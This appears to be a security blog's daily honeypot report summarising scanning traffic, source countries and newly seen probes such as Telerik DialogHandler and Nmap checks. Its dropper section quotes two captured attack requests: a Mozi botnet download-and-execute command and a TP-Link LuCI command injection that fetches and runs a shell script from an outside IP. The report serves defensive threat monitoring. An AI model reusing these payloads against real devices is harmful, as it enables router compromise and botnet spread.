Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-05-08

·432 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-05-08
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 2 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 32 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1283 requests were recorded during the day, originating from 2 different countries, with a peak of 326 requests coming from BG.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
70.40.41.12527;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
45.95.147.209GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sh%3B+wget+http%3A%2F%2F212.81.47.226%2Fsh%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh%60) HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
2582PROPFIND / HTTP/1.1
2841GET /_wpresources/RadEditorSharePoint/6.9.0.0__1f131a624888eeed/Resources/Telerik.Web.UI.DialogHandler.aspx HTTP/1.1
2851GET /app_master/telerik.web.ui.dialoghandler.aspx HTTP/1.1
2861GET /en/providers/htmleditorproviders/telerik/telerik.web.ui.dialoghandler.aspx HTTP/1.1
2871GET /desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx HTTP/1.1
2881GET /desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx HTTP/1.1
2891GET /dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx HTTP/1.1
2901GET /ajaxpro/AjaxPro.Services.ProfileService,AjaxPro.2.ashx HTTP/1.1
3041GET /bLWW HTTP/1.1
3071GET /nmaplowercheck1746701387 HTTP/1.1
3111GET /health HTTP/1.1
3141GET /NmapUpperCheck1746701387 HTTP/1.1
3201GET /Nmap/folder/check1746701387 HTTP/1.1
3911GET /Assets/Telerik.Web.UI.DialogHandler.aspx HTTP/1.1
3921GET /DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx HTTP/1.1
3931GET /providers/htmleditorproviders/telerik/telerik.web.ui.dialoghandler.aspx HTTP/1.1
3941GET /Telerik.Web.UI.DialogHandler.aspx HTTP/1.1
3951GET /common/admin/Jobs2/Telerik.Web.UI.DialogHandler.aspx HTTP/1.1
3961GET /common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx HTTP/1.1
3971GET /AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.aspx HTTP/1.1
3981GET /Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx HTTP/1.1
3991GET /cms/portlets/Telerik.Web.UI.DialogHandler.aspx HTTP/1.1
4001GET /sitecore/shell/RadControls/Spell/Telerik.Spell.DialogHandler.aspx HTTP/1.1
4011GET /common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.aspx HTTP/1.1
4021GET /_controls/responsive/Telerik.Web.UI.DialogHandler.aspx HTTP/1.1
4031GET /controls/events/v2/Telerik.Web.UI.DialogHandler.aspx HTTP/1.1
4151GET /nmaplowercheck1746679829 HTTP/1.1
4161NJMT / HTTP/1.1
4171GET /NmapUpperCheck1746679829 HTTP/1.1
4181GET /Nmap/folder/check1746679829 HTTP/1.1
4271GET /c2fa HTTP/1.1
4281GET /dKFh HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0326BG
1235US
2155NL
3155GB
488SG
573RU
641DE
740PL
825SC
914AZ
1013CA
1111KR
1210PT
1310IN
149CN
159GH
168IL
177AO
186AL
196BR
206UA
216HK
225LT
235RO
243BE
253VN
262ID
272JP
282ZM
291SE
301IT
311NZ
321DK
331TR
341SA
351FR
361EE

Related

Report: 2025-05-07
·387 words
Repport Daily
Report: 2025-05-06
·1021 words
Repport Daily
Report: 2025-05-05
·284 words
Repport Daily